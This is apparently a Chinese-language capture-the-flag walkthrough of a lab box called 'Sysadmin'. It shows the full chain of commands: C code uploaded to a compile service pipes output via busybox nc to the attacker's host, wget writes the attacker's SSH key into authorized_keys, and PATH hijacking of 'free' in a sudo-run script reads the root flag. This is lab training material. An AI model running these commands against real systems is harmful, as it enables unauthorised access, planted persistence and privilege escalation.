Sysadmin

访问过去是个上传的页面,能够编译运行C语言源文件,查看网页源码注释里给出了编译用的命令

img

从命令中看出禁止了从外部链接库,所以要用system函数得自己定义一下。简单尝试后发现很多常用命令没有,但是有busybox用。先搞到当前用户名

1
2
3
4
5
int system(const char *command);
int main() {
    system("echo $(whoami) | busybox nc 192.168.56.1 23333");
    return 0;
}
img

然后写公钥进去,在本地起个服务wget进去

1
2
3
4
5
int system(const char *command);
int main() {
    system("mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && busybox wget 192.168.56.1:8000/id_rsa.pub -O ~/.ssh/authorized_keys");
    return 0;
}

然后直接ssh连上,拿到普通用户的flag

img

sudo -l发现有脚本被配以了sudo权限

img

劫持free命令提权成功读到root的flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
echo@Sysadmin:~$ echo 'ls /root' > /tmp/free
echo@Sysadmin:~$ chmod +x /tmp/free
echo@Sysadmin:~$ export PATH="/tmp:$PATH"
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
Starting daily system information collection at Fri 31 Oct 2025 04:57:54 AM EDT
------------------------------------------------------

(这里省略)

root.txt
------------------------------------------------------
Report complete at Fri 31 Oct 2025 04:57:54 AM EDT
echo@Sysadmin:~$ echo 'cat /root/root.txt'>/tmp/free
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
Starting daily system information collection at Fri 31 Oct 2025 04:58:25 AM EDT
------------------------------------------------------

(这里省略)

flag{root-8b8a8b353298f798e3eb8628661617b6}
------------------------------------------------------
Report complete at Fri 31 Oct 2025 04:58:25 AM EDT